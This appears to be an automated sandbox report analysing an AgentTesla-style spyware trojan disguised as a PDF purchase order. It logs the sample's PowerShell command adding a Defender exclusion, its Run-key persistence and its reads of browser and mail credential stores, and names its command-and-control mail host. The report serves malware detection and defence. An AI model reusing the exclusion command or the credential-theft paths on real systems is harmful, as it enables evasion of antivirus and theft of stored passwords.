                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Window / User API: threadDelayed 7666
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Thread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Thread delayed: delay time: 2400000
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4456892035.0000000001145000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Memory written: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Memory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Process created: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q?<b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}rTHbq N
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Time: 09/22/2024 15:04:10<br>User Name: user<br>Computer Name: 571345<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}r
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR]q
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q9<b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}rTHbq N
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q8<b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}THbq N
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Time: 09/22/2024 15:04:10<br>User Name: user<br>Computer Name: 571345<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}rTe]ql
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @\]qDTime: 09/22/2024 15:04:10<br>User Name: user<br>Computer Name: 571345<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}r
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q3<b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q><b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}THbq N
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Queries volume information: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe VolumeInformation
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Queries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                    Execution: 121 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                    Persistence: 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Privilege Escalation: 1 DLL Side-Loading; 112 Process Injection; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 13 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 11 Masquerading; 141 Virtualization/Sandbox Evasion; 112 Process Injection; 1 Hidden Files and Directories
                    Credential Access: 1 OS Credential Dumping; 31 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                    Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 211 Security Software Discovery; 2 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                    Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 31 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                    Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                    [Behavior graph: ID 1466697, Sample: PO-2024)bekotas.pdf.exe, Start date: 03/07/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    PO-2024)bekotas.pdf.exe | 24% | ReversingLabs | |
                    PO-2024)bekotas.pdf.exe | 32% | Virustotal | | Browse
                    PO-2024)bekotas.pdf.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | 24% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | 32% | Virustotal | | Browse

                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    mail.musabody.com | 0% | Virustotal | | Browse

                    Source | Detection | Scanner | Label | Link
                    https://account.dyn.com/ | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                    http://mail.musabody.com | 0% | Virustotal | | Browse
                    http://mail.musabody.com | 0% | Avira URL Cloud | safe |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    mail.musabody.com | 108.167.140.123 | true | true | | unknown

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://account.dyn.com/ | PO-2024)bekotas.pdf.exe, 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PO-2024)bekotas.pdf.exe, 00000000.00000002.2014482605.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2165652730.000000000312D000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2250775704.0000000003447000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://mail.musabody.com | PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    108.167.140.123 | mail.musabody.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | true
                    Joe Sandbox version: 40.0.0 Tourmaline
                    Analysis ID: 1466697
                    Start date and time: 2024-07-03 09:47:08 +02:00
                    Joe Sandbox product: CloudBasic
                    Overall analysis duration: 0h 9m 47s
                    Hypervisor based Inspection enabled: false
                    Report type: full
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed: 14
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Sample name: PO-2024)bekotas.pdf.exe
                    Detection: MAL
                    Classification: mal100.troj.spyw.evad.winEXE@14/7@1/1
                    EGA Information:
                    • Successful, ratio: 83.3%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 524
                    • Number of non-executed functions: 9
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target ctsdvwT.exe, PID 4612 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    Time | Type | Description
                    03:47:53 | API Interceptor | 9199387x Sleep call for process: PO-2024)bekotas.pdf.exe modified
                    03:48:08 | API Interceptor | 7407221x Sleep call for process: ctsdvwT.exe modified
                    09:47:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    09:48:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    108.167.140.123 | Price 10243975 Bekotas A.S scan.pdf.exe | Get hash | malicious | AgentTesla | Browse |
                    108.167.140.123 | DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exe | Get hash | malicious | AgentTesla | Browse |
                    108.167.140.123 | rRFQ_251477800TM.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
                    108.167.140.123 | Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
                    108.167.140.123 | rPO50018137-14_pdf.exe | Get hash | malicious | AgentTesla, PureLog Stealer, RedLine | Browse |
                    108.167.140.123 | 62402781, Fiyat Teklif Talebi.pdf.exe | Get hash | malicious | AgentTesla, PureLog Stealer, RedLine | Browse |
                    108.167.140.123 | 2024-19-2118fernas.pdf.exe | Get hash | malicious | AgentTesla | Browse |
                    108.167.140.123 | DHL Shipping DocumentTracking No Confirmation.doc.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
                    108.167.140.123 | Fiyat_teklifi_Istegi_23070_PER_120_Adet_#U2026scanneed_00101.pdf.bat.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
mail.musabody.com | Price 10243975 Bekotas A.S scan.pdf.exe | Get hash | malicious | AgentTesla | Browse | 108.167.140.123
mail.musabody.com | DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exe | Get hash | malicious | AgentTesla | Browse | 108.167.140.123
mail.musabody.com | rRFQ_251477800TM.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 108.167.140.123
mail.musabody.com | Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 108.167.140.123
mail.musabody.com | rPO50018137-14_pdf.exe | Get hash | malicious | AgentTesla, PureLog Stealer, RedLine | Browse | 108.167.140.123
mail.musabody.com | 62402781, Fiyat Teklif Talebi.pdf.exe | Get hash | malicious | AgentTesla, PureLog Stealer, RedLine | Browse | 108.167.140.123
mail.musabody.com | 2024-19-2118fernas.pdf.exe | Get hash | malicious | AgentTesla | Browse | 108.167.140.123
mail.musabody.com | DHL Shipping DocumentTracking No Confirmation.doc.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 108.167.140.123
mail.musabody.com | Fiyat_teklifi_Istegi_23070_PER_120_Adet_#U2026scanneed_00101.pdf.bat.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 108.167.140.123
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
UNIFIEDLAYER-AS-1US | https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT | Get hash | malicious | HTMLPhisher | Browse | 162.241.62.33
UNIFIEDLAYER-AS-1US | DHL_AWB 98776013276.xls | Get hash | malicious | FormBook | Browse | 192.185.89.92
UNIFIEDLAYER-AS-1US | AWB 3609 961.pdf.scr.exe | Get hash | malicious | AgentTesla | Browse | 192.185.143.105
UNIFIEDLAYER-AS-1US | Att00173994.exe | Get hash | malicious | FormBook | Browse | 162.240.81.18
UNIFIEDLAYER-AS-1US | 457525.xls | Get hash | malicious | Unknown | Browse | 192.185.89.92
UNIFIEDLAYER-AS-1US | 457525.xls | Get hash | malicious | Unknown | Browse | 192.185.89.92
UNIFIEDLAYER-AS-1US | 457525.xls | Get hash | malicious | Unknown | Browse | 192.185.89.92
UNIFIEDLAYER-AS-1US | 457525.xls | Get hash | malicious | Unknown | Browse | 192.185.89.92
UNIFIEDLAYER-AS-1US | Scan-Payment-Advice.xls | Get hash | malicious | Lokibot | Browse | 192.185.89.92
UNIFIEDLAYER-AS-1US | https://gilbertnow.com/lscache/?initiate=kZwivKCdReGfjYUlVXF2v3UdvZ9rRqUivH | Get hash | malicious | Unknown | Browse | 192.185.91.211
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Reputation:high, very likely benign file
